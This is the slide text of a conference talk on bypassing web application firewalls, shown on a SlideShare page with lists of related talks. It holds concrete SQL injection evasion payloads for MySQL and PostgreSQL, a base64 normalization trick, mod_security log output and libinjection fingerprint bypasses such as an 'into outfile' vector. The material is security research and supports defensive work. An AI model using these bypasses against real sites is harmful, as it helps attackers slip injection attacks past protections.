SlideShare une entreprise Scribd logo

Lie to Me: Bypassing Modern Web Application Firewalls

Ivan Novikov
Ivan Novikov

The report considers analysis of modern Web Application Firewalls. The author provides comparison of attack detection algorithms and discusses their advantages and disadvantages. The talk includes examples of bypassing protection mechanisms. The author points out the necessity of discovering a universal method of masquerading for vectors of various attacks via WAFs for different algorithms.

Technologie
1  sur  38
Télécharger pour lire hors ligne
bypassing modern web application firewalls @ONsec_lab, http://lab.onsec.ru
About • Security audits of webapps since 2009 • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1
WTF WAF? • Web Application Firewall • Prevent attacks • Attack !=Vulnerability • Risk != Attack
SoftwareVS Hardware • Different HTTP parsers • Many «hardware» WAFs used Apache, Lighttpd, Nginx forks
Implementation • Failover bypass: • DoS/DDoS WAF for bypass it- why not?! • What happens with traffic when your filter is overloaded? • XML, regexp, token bombs for this • Not so silently, right? :)
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Protocol level bug looks like abyss
Parse HTTP packets • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH- US-2012 • Nice yesterday bypass Imperva by @webpentest during PHDays WAF bypass contest: Content-Type: invalid :))) • Classic example - HTTP Parameter Pollution • Are you sure that WAF’s and webapp’s HTTP protocols are the same?
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Data normalization level bug looks like tunnel
Data normalization • Format parsers, for example: • base64 • xml • JSON • Are you sure that WAF’s and webapp’s parsers are the same?
Data normalization • mod_security, t:base64decode • decode string until first = char • PHP, base64_decode($strict=false) • decode whole string • Attack vector • YWFh=attackhere • Use t:base64DecodeExt!
Data normalization • Yet another example from yesterday PHDays WAF bypass contest - Imperva XML decoding • First decode XML, that validate attacks • XML input was not set up as XML type in WAF • Put attack as XML-encoded data (entities) to bypass regexpr: union select 123
WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
Detection logic bug looks like ninja
Detection logic • Regular expressions (mod_security, etc) • Tokenizers (libinjection) • ...
SQL syntax • First read this works: • http://websec.wordpress.com/tag/sql- obfuscation/ • http://www.slideshare.net/nickgsuperstar/ new-techniques-in-sql-obfuscation • Obfuscated vector is more than welcome! • Try to exploit
SQL syntax - time to fuzzing! • SELECT{$P1} 1 FROM... • ...UNION{$P2}FROM... • SELECT VERSION{$P3}() • SELECT{$P4}VERSION{P4}() • SELECT 1{P5}BAD
MySQL: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A-0x0D,0x20,0xA0]* • Fuzzed only 1-bytes sequences, not /**/, etc
MySQL: time to fuzzing! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x60 (backquote `) • {D} = # + 0x60 • Have a fun with regexp: • select`version` ( ) • ... where id=’1’`’ and ... - commented now
MySQL: break tokens! • SELECT{O}1 FROM test • {O} = [-+!~@] • SELECT 1{W}FROM test; • {W} = [.d?|ed] • Part of this discovered during our WAF bypass contest last year by @Black2Fan
MySQL: break tokens! • SELECT-1e1FROM test • SELECT~1.FROM test • SELECTNFROM test • SELECT@^1.FROM test • SELECT-id-1.FROM test • all tested on MySQL 5.1.66-0-squeeze1
Postgres: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A,0x0C,0x0D,0x20]* • Fuzzed only 1-bytes sequences, not /**/, etc
Postgres: time to fuzz! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x22 (doblequote ‘’) • {D} = # + 0x22 • Have a fun with regexp: • select’’version’’ ( ) • ... where id=’1’`’ and ... - commented now
Postgres: break tokens! • SELECT{O}1 FROM test • {O} = [.-+!~@] - @ is absolute operator • SELECT 1{W}FROM test; • {W} = [.d?|ed|] - nothing is also OK!
Postgres: break tokens! • SELECT-1ROM test • SELECT.1FROM test • SELECT~1FROM test • SELECT-id-1FROM test • SELECT-id-1FROM test • all tested on PostgreSQL 9.2.4
Time to exploit! • mod_security • libinjection • others?
mod_security • CRS (https://github.com/SpiderLabs/owasp- modsecurity-crs) • base_rules • many regular expressions
mod_security • ?id=select id from test • ?id=select-id-1.from test Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all| d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " ' ` xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["'`xc2xb4xe2x80x99xe2x80x98]%)| (?:["'`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["'`xc2xb4 ..." at ARGS:id. [file "/ opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
mod_security • ?id=1 or 1=1 or • ?id=1 or true or Message: Access denied with code 403 (phase 2). Pattern match "(?i:([s'"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s ' " ` xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s'"` xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." at A R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s / modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/ 6.5.2"]
libinjection • Token based detection • No more regexp! • Fingerprint for each attack 1-5 tokens sequence • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints • Is it enough to block all SQLi?
libinjection • Bytes obfuscation doesn’t works now • But... • What happens if you missed some tokens?
Attack #1. Missed token / fingerprint • As fuzzed above ` 0x60 byte can be used as a comment in MySQL and also as function quotes • ' into outfile 'asd' -- • block - skksc • ' into outfile 'asd' ` • bypass - skksn
Attack #2.Token obfuscation • Find any unblocked fingerprint • Obfuscate your attack to produce the same fingerprint • Fingerprint have only 5 tokens • Need to exploit anti-obfuscation logic (1+1 and others hardcoded token combinations)
Attack #2.Token obfuscation • Fingerprint «v1111» looks like safe • @a1a2a3a4 - variable but fingerprint of this string is «v», no numeric token here • @ф1й2у3ц4 - is valid variable for MySQL, but produce fingerprint «v1111» • @ф1й2у3ц4 union select ... produce fingerprint «v1111» also :)
Some stats • Hacking WAFs since 2009 • About 50 different implementations • About 10 different engines • Time to hack: • min: 3 min • max: 19 hours • average: 1hour
Questions? • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1

Recommandé

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIMikhail Egorov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 

Recommandé

WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
A Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakA Forgotten HTTP Invisibility Cloak
A Forgotten HTTP Invisibility CloakSoroush Dalili
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing TechniquesAvinash Thapa
 
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016
The Secret Life of a Bug Bounty Hunter – Frans Rosén @ Security Fest 2016Frans Rosén
 
Neat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionNeat tricks to bypass CSRF-protection
Neat tricks to bypass CSRF-protectionMikhail Egorov
 
Unsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIUnsafe JAX-RS: Breaking REST API
Unsafe JAX-RS: Breaking REST APIMikhail Egorov
 
Polyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraPolyglot payloads in practice by avlidienbrunn at HackPra
Polyglot payloads in practice by avlidienbrunn at HackPraMathias Karlsson
 
Secure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesSecure Coding - Web Application Security Vulnerabilities and Best Practices
Secure Coding - Web Application Security Vulnerabilities and Best PracticesWebsecurify
 
XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS VectorsRodolfo Assis (Brute)
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumerationleminhvuong
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧Orange Tsai
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadSecurity BSides Ahmedabad
 
OWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceOWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceNarudom Roongsiriwong, CISSP
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 
Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)Ivan Novikov
 

Contenu connexe

Tendances

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?Yurii Bilyk
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Orange Tsai
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeAjin Abraham
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Yassine Aboukir
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016bugcrowd
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...bugcrowd
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMMikhail Egorov
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceFrans Rosén
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodologybugcrowd
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug BountiesOWASP Nagpur
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumerationleminhvuong
 
Secure code
Secure codeSecure code
Secure codeddeogun
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsMikhail Egorov
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat Security Conference
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧Orange Tsai
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsMikhail Egorov
 
OWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceOWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceNarudom Roongsiriwong, CISSP
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)Michael Furman
 

Tendances (20)

XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?XSS - Do you know EVERYTHING?
XSS - Do you know EVERYTHING?
 
Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧Security in PHP - 那些在滲透測試的小技巧
Security in PHP - 那些在滲透測試的小技巧
 
Injecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at RuntimeInjecting Security into vulnerable web apps at Runtime
Injecting Security into vulnerable web apps at Runtime
 
Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?Hacking WebApps for fun and profit : how to approach a target?
Hacking WebApps for fun and profit : how to approach a target?
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016Bug Bounty Hunter Methodology - Nullcon 2016
Bug Bounty Hunter Methodology - Nullcon 2016
 
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
How to Shot Web - Jason Haddix at DEFCON 23 - See it Live: Details in Descrip...
 
ORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORMORM2Pwn: Exploiting injections in Hibernate ORM
ORM2Pwn: Exploiting injections in Hibernate ORM
 
Time based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webserviceTime based CAPTCHA protected SQL injection through SOAP-webservice
Time based CAPTCHA protected SQL injection through SOAP-webservice
 
Ekoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's MethodologyEkoparty 2017 - The Bug Hunter's Methodology
Ekoparty 2017 - The Bug Hunter's Methodology
 
SSRF For Bug Bounties
SSRF For Bug BountiesSSRF For Bug Bounties
SSRF For Bug Bounties
 
Module 4 Enumeration
Module 4 EnumerationModule 4 Enumeration
Module 4 Enumeration
 
Secure code
Secure codeSecure code
Secure code
 
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programsAEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
AEM hacker - approaching Adobe Experience Manager webapps in bug bounty programs
 
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
BlueHat v17 || Dangerous Contents - Securing .Net Deserialization
 
關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧關於SQL Injection的那些奇技淫巧
關於SQL Injection的那些奇技淫巧
 
New methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applicationsNew methods for exploiting ORM injections in Java applications
New methods for exploiting ORM injections in Java applications
 
Frans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides AhmedabadFrans Rosén Keynote at BSides Ahmedabad
Frans Rosén Keynote at BSides Ahmedabad
 
OWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object ReferenceOWASP Top 10 A4 – Insecure Direct Object Reference
OWASP Top 10 A4 – Insecure Direct Object Reference
 
OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)OWASP A4 XML External Entities (XXE)
OWASP A4 XML External Entities (XXE)
 

En vedette

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngDmitry Evteev
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)Ivan Novikov
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknessesIvan Novikov
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20Nick Galbreath
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)OWASP Ottawa
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath InjectionsAMol NAik
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseNoaman Aziz
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictionsMukesh k.r
 
Automated and unified opensource web application testing
Automated and unified opensource web application testingAutomated and unified opensource web application testing
Automated and unified opensource web application testingnavajanegra
 
Proactive approach
Proactive approachProactive approach
Proactive approachIvan Novikov
 
Методы разработки качественного и чистого кода
Методы разработки качественного и чистого кодаМетоды разработки качественного и чистого кода
Методы разработки качественного и чистого кодаIvan Novikov
 
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...OWASP Russia
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any meansMoabi.com
 
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris SavkovOWASP Russia
 
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...OWASP Russia
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler CollectionMoabi.com
 

En vedette (20)

Methods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall EngMethods to Bypass a Web Application Firewall Eng
Methods to Bypass a Web Application Firewall Eng
 
OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)OpenSSL rands (fork-safe)
OpenSSL rands (fork-safe)
 
Data normalization weaknesses
Data normalization weaknessesData normalization weaknesses
Data normalization weaknesses
 
New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20New techniques in sql obfuscation, from DEFCON 20
New techniques in sql obfuscation, from DEFCON 20
 
XPath Injection
XPath InjectionXPath Injection
XPath Injection
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)XML Attack Surface - Pierre Ernst (OWASP Ottawa)
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
 
XML & XPath Injections
XML & XPath InjectionsXML & XPath Injections
XML & XPath Injections
 
Sql injection bypassing hand book blackrose
Sql injection bypassing hand book blackroseSql injection bypassing hand book blackrose
Sql injection bypassing hand book blackrose
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Bypass file upload restrictions
Bypass file upload restrictionsBypass file upload restrictions
Bypass file upload restrictions
 
DNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmapDNS Exfiltration Using sqlmap
DNS Exfiltration Using sqlmap
 
Hacking XPATH 2.0
Hacking XPATH 2.0Hacking XPATH 2.0
Hacking XPATH 2.0
 
Automated and unified opensource web application testing
Automated and unified opensource web application testingAutomated and unified opensource web application testing
Automated and unified opensource web application testing
 
Proactive approach
Proactive approachProactive approach
Proactive approach
 
Методы разработки качественного и чистого кода
Методы разработки качественного и чистого кодаМетоды разработки качественного и чистого кода
Методы разработки качественного и чистого кода
 
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
[1.4] «Ой, не шмогла». Обзор ограничений современных технологий в области ...
 
[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means[HackInTheBox] Breaking virtualization by any means
[HackInTheBox] Breaking virtualization by any means
 
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
[3.3] Detection & exploitation of Xpath/Xquery Injections - Boris Savkov
 
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
Web Application Firewalls: Advanced analysis of detection logic mechanisms, V...
 
[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection[Defcon24] Introduction to the Witchcraft Compiler Collection
[Defcon24] Introduction to the Witchcraft Compiler Collection
 

Similaire à Lie to Me: Bypassing Modern Web Application Firewalls

Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Ontico
 
ELK stack at weibo.com
ELK stack at weibo.comELK stack at weibo.com
ELK stack at weibo.com琛琳 饶
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionChema Alonso
 
JSLT: JSON querying and transformation
JSLT: JSON querying and transformationJSLT: JSON querying and transformation
JSLT: JSON querying and transformationLars Marius Garshol
 
Artem Storozhuk "Building SQL firewall: insights from developers"
